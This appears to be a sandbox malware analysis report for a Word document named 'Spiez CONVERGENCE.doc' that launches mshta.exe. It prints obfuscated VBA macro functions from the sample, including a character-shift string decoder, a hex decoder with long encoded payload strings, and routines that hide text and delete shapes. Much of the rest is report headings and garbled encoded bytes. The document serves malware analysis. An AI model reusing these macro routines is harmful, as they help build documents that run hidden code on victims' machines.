2026\x201av\x201ak\x201a\x2018pr\x201dgh\x201ag\x201dg\xfffd\x2026g\x0178B_BJD\xfffdU\x0178\xfffdT\x0178\xfffdV\x0178\xfffdR\x0178\xfffdS\x0178DBO\x02c6I\xfffd\x2014INI\x2021INI\x2013\x017d\x203ae\x2018INIu\x2039\x017d\x2021\xfffdINI\xfffd\x2013\x2039IK]khJF\xfffd\x2019uxg\x201du\x201a\x2039q\xfffd\x201av\x201acdn\x2021\x0178PD\x2019\x201a\x2022xg\x201at\x2022k\x2018\xfffdDPD\xfffd\x201ac\x0152\x2018tDBOi\x2021BUK\xfffdF\xfffdi\x201a\x2019h\x0178_BBFo\|\x2022PDc\x2022ug\xfffd\x201e\x201a\x017d\x203aDPJD\xfffdT\x0178\xfffdS\x0178\xfffdR\x0178DBO\x02c6BIv{\x2019\x2021INI\x2013INIigIKPk\xfffd\x02dc\x2018\xfffd\x2021JJD\xfffdS\x0178\xfffdW\x0178\xfffdU\x0178\xfffdV\x0178\xfffdT\x0178\xfffdR\x0178\xfffdX\x0178DO\x02c6BI\xfffdPwINIu\x203a\x2022\x2013\x2021\xfffdPoINI\xfffd\x0192\x2013\x2039\x2018INI\xfffd\x0192\x2030\x2021\xfffd\x2021\xfffdINI\x2013Pc\x2014\x2013\x2018INI\x0192INI\x2013\x2039\x017d\x2022IKKPIig\x2013h\x2039\x2021\x201a\x017dfIJJD\xfffdS\x0178\xfffdR\x0178\xfffdV\x0178\xfffdT\x0178\xfffdW\x0178\xfffdU\x0178DBO\x02c6I\x0192INI\x2026INI\x2026\x203auINI\x2022INI\x2026\x0160\x2021\x2020i\x201d\x2018\x2014\x2019r\x2018\x017d\x2039INI\x2021\x2013\x2013\x2039\xfffd\x2030IKNIpIMJD\xfffdU\x0178\xfffdT\x0178\xfffdS\x0178\xfffdR\x0178DBO\x02c6I\x2026INI\x2039INI\x017d\x2039\x2026Nu\x2013\x0192\x2013INI\x2018\xfffdr\x2014\x201eIKK]khJF\xfffd\x2030\x201a\x2019\x02c6\x0178K\xfffdF\xfffdi\x201a\x2019e\x0178_F\xfffdi\x201arh\x0178PJD\xfffdR\x0178\xfffdS\x0178\xfffdT\x0178DBO\x02c6BIigvxcINI\x017dINIw\x2021IKPk\xfffd\x02dc\x2018\xfffd\x2021JF\xfffd\xfffdw\x201a\x017dn\x0178K]khJF\xfffdi\x201ar\x2026\x0178}JD\xfffdR\x0178\xfffdS\x0178DBO\x02c6Iu\x2026\x201d\x2039\x2019INI\x2013dIKMJD\xfffdT\x0178\xfffdR\x0178\xfffdS\x0178\xfffdU\x0178DO\x02c6BI\x2030\x2030INI\x2039\xfffdINI\x017d\x2018\x2026\xfffdn\x2018INI\x2030IK\x7fK\xfffdF\xfffdi\x201a\x2019\x2026\x0178}JD\xfffdT\x0178\xfffdR\x0178\xfffdS\x0178DBO\x02c6BI\x201d\x2039\x2019\x2013INIdINIu\x2026IKMJD\xfffdT\x0178\xfffdS\x0178\xfffdR\x0178\xfffdU\x0178DBO\x02c6BI\xfffdn\x2018\x2030\x2030INI\x2026INI\x017d\x2018INI\x2039\xfffd\x2030IK\x7f}JD\xfffdU\x0178\xfffdT\x0178\xfffdR\x0178\xfffdS\x0178DBO\x02c6I\x201e\x017d\x2021u\x2026\x201d\x2039INI\x2019\x2013dINI\x0192INIg\xfffdIKMJD\xfffdS\x0178\xfffdR\x0178\xfffdT\x0178DO\x02c6BI\x2018\x2030INI\x017d\x2018\x2026\xfffdnINI\x2030\x2039\xfffd\x2030IK\x7f_R]F\xfffd\x2030\x201a\x2019\x2026\x0178}JD\xfffdR\x0178\xfffdS\x0178DBO\x02c6BIu\x2026INI\x201d\x2039\x2019\x2013dIKMJD\xfffdT\x0178\xfffdU\x0178\xfffdR\x0178\xfffdS\x0178DO\x02c6BI\xfffdn\x2018\x2030\x2030INI\x2039\xfffd\x2030INI\x017dINI\x2018\x2026IK\x7f}JD\xfffdR\x0178\xfffdV\x0178\xfffdT\x0178\xfffdW\x0178\xfffdS\x0178\xfffdX\x0178\xfffdY\x0178\xfffdU\x0178DBO\x02c6BIg\xfffd\x0192INI\x2018INI\x2021u\x2026INI\x2030\x2039\xfffd\x2030INI\x201e\x017dINI\x201d\x2039\x2019\x2013d\x017d\x2018\x2026\xfffdk\xfffd\x02dcINI\x2026\x0192INI\x2013\x2039\x2018\xfffdn\x2018\x2030IK\x7f_R\x0178F\xfffd\x02dc\x201ac\x017d\x0178_BBJ\x20acHJD\xfffdT\x0178\xfffdS\x0178\xfffdR\x0178DO\x02c6BI\x0192\x201e\x017dgINIct\x2039INIxIKBBJDkDMDd\x0160t\x2122DKKPx\x0192\x017d\x2014g\\JD\xfffdS\x0178\xfffdR\x0178DO\x02c6I\x2021\x2122INI\xfffdIKPk\xfffd\x02dc\x2018\xfffd\x2021JK]F\xfffdx\x201ac\x017d\x0178PJD\xfffdS\x0178\xfffdR") -> 3420
Chr
Asc
Mid

Line	Instruction	Meta Information
139	Function czeoPYDHuXBP(eKNlehsxPeBLdPKiBpRioVJA as String) as String
140	Dim FxfJcsCLC as Long	executed
141	Dim PiVcpWXzBlSx as String
142	Dim GugteEb as Integer
143	GugteEb = 34
144	For FxfJcsCLC = 1 To Len(eKNlehsxPeBLdPKiBpRioVJA)	Len("y\x2022\x2026\x201d\x2039\x2019\x2013Pu\x0160\x2021\x017d\x017d") -> 13 executed
145	PiVcpWXzBlSx = PiVcpWXzBlSx & Chr(Asc(Mid(eKNlehsxPeBLdPKiBpRioVJA, FxfJcsCLC, 1)) - GugteEb)	Chr Asc Mid
146	Next FxfJcsCLC	Len("y\x2022\x2026\x201d\x2039\x2019\x2013Pu\x0160\x2021\x017d\x017d") -> 13 executed
147	czeoPYDHuXBP = PiVcpWXzBlSx
148	End Function

Function sfiSFQuRDPlM, APIs: 4, Strings: 0, Number of lines: 6, Relevance: 7.506

APIs	Meta Information
Len	Len("49659190") -> 8 Len("85494b4b") -> 8 Len("4b5d42469d") -> 10 Len("42469d74") -> 8 Len("579f9d529f9d") -> 12 Len("549f9d58") -> 8 Len("9f9d599f") -> 8 Len("9d5a9f9d") -> 8 Len("518f9b958790494e4985858795") -> 26 Len("91494e4994494e4989") -> 18 Len("5183494b5d42469d9585828a728263966a9f5f") -> 38 Len("655c7e79") -> 8 Len("50677a8742") -> 10 Len("4242504a449d529f9d539f9d54") -> 26 Len("4983494e4996") -> 12 Len("8b8e9549") -> 8 Len("6796688b8782") -> 12 Len("8e66494a") -> 8 Len("4a449d53") -> 8 Len("9f9d529f") -> 8 Len("424f884983494e") -> 14 Len("49859b75494e4995") -> 16 Len("878669949197927291") -> 18 Len("4d4a449d559f9d549f9d539f9d52") -> 28 Len("9d549f444f") -> 10 Len("7f4a449d56") -> 10 Len("9f9d559f9d52") -> 12 Len("9f9d539f9d579f") -> 14 Len("4950958774") -> 10 Len("986b656792494e4991") -> 18 Len("494e4963") -> 8 Len("966f494b4b42425d42424670988353") -> 30 Len("7967494e499787757649") -> 20 Len("529f9d539f9d549f") -> 16 Len("88424995494e4965919096838b90494b506b9098918d") -> 44 Len("87494e4964") -> 10 Len("498f494b5d") -> 10 Len("9d549f9d52") -> 10 Len("4f8b76494b42") -> 12 Len("94444d446b83") -> 12 Len("9d569f9d579f9d529f9d54") -> 22 Len("444f684990766b838e8563") -> 22 Len("494e496a67494e4985") -> 18 Len("6776494e49") -> 10 Len("72877f4a") -> 8 Len("5f7d967b72677f4a44") -> 18 Len("676f494e497567494e4976494b") -> 26 Len("529f9d53") -> 8 Len("9d5a9f9d57") -> 10 Len("9f9d569f") -> 8 Len("44424f884249") -> 12 Len("87494e49919995") -> 14 Len("767c494e") -> 8 Len("494e4987949549") -> 14 Len("494e499275918896998394494e498b9190494e497749") -> 44 Len("82879282") -> 8 Len("4d4a4a4a") -> 8 Len("9d529f9d") -> 8 Len("9f44424f88") -> 10 Len("49658e494e49") -> 12 Len("508a9683494e") -> 12 Len("4b4f9487928e") -> 12 Len("63656742424a7d") -> 14 Len("4d7d856a") -> 8 Len("9d549f9d5b9f9d5a9f9d529f9d569f44424f884249") -> 42 Len("44424f67") -> 8 Len("6385968b") -> 8 Len("9190424a") -> 8 Len("569f9d52") -> 8 Len("494e4991") -> 8 Len("504a449d52") -> 10 Len("9f9d539f9d549f9d559f44") -> 22 Len("446f71826687447d527f42") -> 22 Len("826f87449f5d42869142") -> 20 Len("748390494e") -> 10 Len("4b42469d") -> 8 Len("72826376") -> 8 Len("8e87424a4a504a44") -> 16 Len("9d529f9d54") -> 10 Len("449d539f9d529f9d549f444f8849919987494e4976916e494e4994494b506b9098918d874a4b4b504a449d539f9d529f9d549f444f8842498b90494e496591909683494e4995494b") -> 144 Len("98918d87") -> 8 Len("424f78838e") -> 10 Len("978742469d") -> 10 Len("9565828a") -> 8 Len("9d539f9d55") -> 10 Len("8396494e4975") -> 12 Len("8b8e9949") -> 8 Len("7482638582") -> 10 Len("6768826794679085679f425f42") -> 26 Len("529f9d539f44424f88499097494e4987494e49968e9b6591494e49758b8e") -> 60 Len("8790494e4990968b49") -> 18 Len("498b908949") -> 10 Len("4b7f7d4a44") -> 10 Len("4e496790494b4d") -> 14 Len("9f44424f884249758549") -> 20 Len("4e49948b929664494b") -> 18 Len("9f9d569f9d539f9d579f9d") -> 22 Len("497186494b425d7d9596948b90897d7f7f42469d7282") -> 44 Len("9292668396837e7e6e9185838e7e7e6f8b85949195918896") -> 48 Len("9f9d589f9d59") -> 12 Len("83494e4991") -> 10 Len("494e4987") -> 8 Len("8b91906e918949") -> 14 Len("675c5c4a449d53") -> 14 Len("444f88498799494e4990494b506b9098918d874a4b5d469d7882638e9f504a449d539f9d52") -> 74 Len("9b494e49") -> 8 Len("4e499588") -> 8 Len("7487726e") -> 8 Len("424988645b49") -> 12 Len("4f95928e8b96") -> 12 Len("424f8842469d688277") -> 18 Len("8a728382768a9f") -> 14 Len("9d549f9d539f4442") -> 16 Len("7197964f494e49978e8e494e4970494b") -> 32 Len("9d539f9d549f9d559f44424f8842") -> 28 Len("497587494e49964f494e496b96878f72949192") -> 38 Len("884249696776") -> 12 Len("469d9077828e6e") -> 14 Len("469d698272859f") -> 14 Len("7d4a449d529f9d") -> 14 Len("539f9d559f44") -> 12 Len("90494e498e91") -> 12 Len("858d6e91494e") -> 12 Len("4989494b7f4b9d469d698292859f7d4a449d549f9d529f9d539f44424f") -> 58 Len("884249948b9296494e4964494e497585494b4d4a449d549f9d539f9d529f9d559f44424f8842498d6e91") -> 84 Len("8989494e4985494e") -> 16 Len("4a469d92") -> 8 Len("75786794") -> 8 Len("75828b71") -> 8 Len("8742554b9d46") -> 12 Len("6f7c95504463") -> 12 Len("9575678f84828e9b4450") -> 20 Len("494e49696749") -> 12 Len("8790494e4996506397") -> 18 Len("7a66738b9b83") -> 12 Len("877383717589766c77") -> 18 Len("498e494b7f5f469d7882636e9f9f676e75879d424a504a44") -> 48 Len("9d529f9d539f9d549f9d569f44424f8842") -> 34 Len("9d819f7f9f5d") -> 12 Len("5f4a469d8b9f4d53") -> 16 Len("8a9f4d46") -> 8 Len("5f504a449d53") -> 12 Len("4f494e4987") -> 10 Len("6576494b424a") -> 12 Len("9d559f9d539f44") -> 14 Len("7b9596876f5070") -> 14 Len("6b87494b") -> 8 Len("9d53539f9d5352") -> 14 Len("6b76424f996b906691") -> 18 Len("999542426a8b6686677042424242") -> 28 Len("424f424248484242655c7e798b90669179757e959b9576678f55547e656f665067") -> 66 Len("4e496694") -> 8 Len("4b494e49") -> 8 Len("52525a42") -> 8 Len("82659f50") -> 8 Len("9d539f44424f") -> 12 Len("918d874a4a449d53") -> 16 Len("494e499587494e4990") -> 18 Len("96494b4e469d779f") -> 16 Len("4e49919072") -> 10 Len("494b4b5044758267") -> 16 Len("529f444f8849") -> 12 Len("6576494e494f71846c67494e49706799494b424a449d549f") -> 48 Len("8d66729199") -> 10 Len("8794758a") -> 8 Len("878e8e494e") -> 10 Len("494e4985") -> 8 Len("95494e4981494e49") -> 16 Len("9188965a494e49798b90") -> 20 Len("4e496e494e495a49") -> 16 Len("494e49918896") -> 12 Len("926e83658742424a7d858a63747f57") -> 30 Len("7b44504485") -> 10 Len("87826863778e") -> 12 Len("63826e75445d46") -> 14 Len("9d9585748b8292765c92") -> 20 Len("9f425f42469d7982859f5044") -> 24 Len("884249988f494e496493494b42424b5098638e") -> 38 Len("449d549f") -> 8 Len("9d529f9d53") -> 10 Len("64494e4967") -> 10 Len("9083848e87") -> 10 Len("7585948b49") -> 10 Len("9f44424f8849") -> 12 Len("8b494e498e") -> 10 Len("91858d6e9189") -> 12 Len("4b506b9098918d") -> 14 Len("63494e498a969692955c515183928b50494e498786948b988750494e494363946b4f7a75494e495251958a8394494e4985918f51985350494e4991494e499887494e498795494e4990494e494f869c8191494e4996879096494e4969599072494e4970494b4b5d469d6b789f5f469d86826376839f7d525050557f5d469d86638276839f5f469d86638276639f7d") -> 284 Len("494e498e") -> 8 Len("4991494e") -> 8 Len("9d539f9d53599f") -> 14
Chr$
Val
Mid$

Line	Instruction	Meta Information
70	Function sfiSFQuRDPlM(ByVal wqzOrW as String) as String
71	Dim akGeS as Long	executed
72	For akGeS = 1 To Len(wqzOrW) Step 2	Len("49659190") -> 8 executed
73	sfiSFQuRDPlM = sfiSFQuRDPlM & Chr$(Val("&H" & Mid$(wqzOrW, akGeS, 2)))	Chr$ Val Mid$
74	Next akGeS	Len("49659190") -> 8 executed
75	End Function

Function dpIPCghTYIO, APIs: 0, Strings: 5, Number of lines: 14, Relevance: 6.264

Strings	Decrypted Strings
"\x017d\x0161\x2039\x0192""\x2014l\x8f\x2030\|""s\x201d\x201ehk{\x8f\|ij"
"k\x0161o\x90\x2019q{"
"zmg\x0153t""f\x2122\x2122h""ly\x2013\x2014s\x2039\x2022"
"k\x0161o\x90\x2019q{"
"zmg\x0153t""f\x2122\x2122h""ly\x2013\x2014s\x2039\x2022"

Line	Instruction	Meta Information
108	Function dpIPCghTYIO(rMOBquizQidfuY7 as Integer, TpBzHbwmzNSwc as String)
109	Dim Omyuwro as Integer	executed
110	Omyuwro = rMOBquizQidfuY7 * 2
111	TpBzHbwmzNSwc = "\x017d\x0161\x2039\x0192" & "\x2014l\x8f\x2030\|" & "s\x201d\x201ehk{\x8f\|ij"
112	Dim grMOBquizQidfuY8 as Integer
113	Dim glLecopUHJu as Integer
114	grMOBquizQidfuY8 = 2833
115	glLecopUHJu = 6
116	If grMOBquizQidfuY8 > glLecopUHJu Then
117	TpBzHbwmzNSwc = "zmg\x0153t" & "f\x2122\x2122h" & "ly\x2013\x2014s\x2039\x2022" & "k\x0161o\x90\x2019q{" + TpBzHbwmzNSwc
118	Omyuwro = rMOBquizQidfuY7 - rMOBquizQidfuY7
119	Endif
120	dpIPCghTYIO = Omyuwro
121	End Function

Function wZPQWBVG, APIs: 3, Strings: 0, Number of lines: 5, Relevance: 3.755

APIs	Meta Information
WholeStory
Font
Select

Line	Instruction	Meta Information
85	Function wZPQWBVG()
86	Selection.WholeStory	WholeStory executed
87	Selection.Font.Color = - 587137025	Font
88	ThisDocument.Range(0, 0).Select	Select
89	End Function

Function MqDmFnN, APIs: 1, Strings: 0, Number of lines: 7, Relevance: 1.257

APIs	Meta Information
Delete

Line	Instruction	Meta Information
77	Function MqDmFnN()
78	With ActiveDocument.Shapes	executed
79	For rMOBquizQidfuY = . Count To 1 Step - 1
80	. Item(rMOBquizQidfuY).Delete	Delete
81	Next
82	End With
83	End Function

Reset < >

Analysis Process: mshta.exe PID: 4000 Parent PID: 1376

Executed Functions

Function 00F90FE7, Relevance: .0, Instructions: 4

Memory Dump Source

Source File: 00000009.00000003.16297887961.00F90000.00000010.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_f90000_mshta.jbxd

Non-executed Functions

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Spiez CONVERGENCE.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 36166

General

VBA Code Keywords

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General

Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 892

General

Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 392

General

Stream Path: 1Table, File Type: data, Stream Size: 9668

General

Stream Path: Data, File Type: data, Stream Size: 12708

General

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 446